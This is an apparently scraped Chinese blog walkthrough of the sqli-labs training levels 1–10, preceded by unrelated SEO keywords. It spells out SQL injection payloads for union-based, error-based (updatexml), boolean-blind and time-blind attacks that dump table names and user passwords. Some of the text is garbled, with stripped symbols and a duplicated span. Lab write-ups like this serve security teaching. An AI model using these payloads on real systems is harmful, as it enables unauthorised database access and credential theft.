做国际物流需要哪些网站,海尔网站建设投入,重庆企业网站建设价格,泊头网站建设的有哪些文章目录 less-1less-2less-3less-4less-5less-6less-7less-8less-9less-10 less-1
1、提示输入参数id#xff0c;且值为数字#xff1b;
2、判断是否存在注入点 id1报错#xff0c;说明存在 SQL注入漏洞。 3、判断字符型还是数字型 id1 and 11 --id1 and 12 --id1且值为数字
2、判断是否存在注入点 id1报错说明存在 SQL注入漏洞。 3、判断字符型还是数字型 id1 and 11 --id1 and 12 --id1 --注意注释#可能没有--好使 两次页面返回均正常说明为字符型注入。 下面判断闭合类型 也可以从报错的地方看出是单引号闭合。 可以看出是单引号闭合。 综上该关卡属于字符型注入且闭合符号为单引号。 4、判断字段数 id1 order by 3 --字段数为三也就是说sql查询的结果中有三列数据。 5、查看回显点 id-1 union select 1,2,3 --注意要确保union select前面的语句也就是id在数据库中是不存在的才会看到回显点。 6、查看数据库名 id-1 union select 1,(select database()),3 --可以得到数据库名为security. 7、查看表名 id-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schemasecurity),3 --可以看出security表中有四张表。 8、查看字段名 id-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers),3 --9、查看字段值 id-1 union select 1,(select group_concat(concat(username,%23,password)) from security.users),3 --下面主要介绍思路就不全流程走完了。less-2 1、判断是否存在注入漏洞 id1 说明存在SQL注入漏洞。 2、判断字符型还是数字型 id1 and 11 --id1 and 12 --说明属于数字型注入。 3、判断字段数 id1 order by 3 --后面的步骤和前一关一样在这里不在赘述。
less-3
1、用单引号判断是否存在sql注入。 说明存在sql注入漏洞。 2、判断字符型还是数字型 返回正常说明属于字符型注入。 下面确定闭合符号 从这里看出后端代码是在id值后面加了)再进行查询的。 所以闭合符号为)。 less-4
用单引号判断是否存在sql注入。 单引号不行试试双引号 说明存在SQL注入漏洞。单引号没反应只能说明此处的闭合方式没用到单引号试试其他符号。 从这里可以看出闭合方式是双引号单括号。最外面的那个单引号是为了区分其他无关报错信息。 less-5
用单引号判断是否存在SQL注入漏洞 可以看到存在SQL注入漏洞且闭合符号为单引号。 因为页面没有回显所以这里我们不能用联合查询需要用盲注。 可以看到此处只有两种页面显示可以使用布尔盲注 因为有报错所以也可以使用报错注入。 使用盲注直接判断数据库长度 id1 and length(database())8 -- //判断数据库名长度说明当前数据库名的长度为8这里就不演示布尔盲注太麻烦了~盲注。 这里使用报错注入进行演示 1查数据库名 id1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- 2查表名 id1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemasecurity) -- 3查字段名 id1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers),0x7e),1) -- 4查字段值 id1 and updatexml(1,concat(0x7e,(select group_concat(concat(username,%23,password)) from security.users),0x7e),1) -- 注意该语句对输出的字符长度也做了限制其最长输出32位。 less-6
单引号判断是否存在sql注入漏洞 单引号不行双引号上成了~ 可以看出只有双引号闭合故试试 既然有报错那就用报错注入吧~
查数据库名 id1 and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- 后面就不多赘述了~ less-7
用单引号判断是否存在sql注入 页面返回不一样所以存在SQL注入漏洞但是没有报错也没有回显只能使用盲注。 需要试试出来闭合符号为))
使用布尔盲注直接判断数据库长度 id1)) and length(database())8 -- //判断数据库名长度less-8 通过单引号判断存在 sql注入漏洞同时发现闭合引号就是单引号。因为此处没有报错也没有回显只能用布尔盲注。 使用布尔盲注直接判断数据库长度 id1)) and length(database())8 -- //判断数据库名长度less-9
这一关需要用时间盲注payload: id1 and sleep(5) -- //数字型则等待5秒id1 and sleep(5) -- //字符型则等待5秒可知存在SQL注入漏洞闭合符号为单引号且类型属于时间盲注。 使用时间盲注直接判断数据库长度 id1 and if(length(database())8,sleep(5),1) -- //猜数据库名长度数据库长度为8后续就是一个一个字母猜数据库名然后表名、字段名、字段内容在这里不在赘述。 less-10
这一关与前一关得区别主要是闭合符号换成了双引号其余都一样。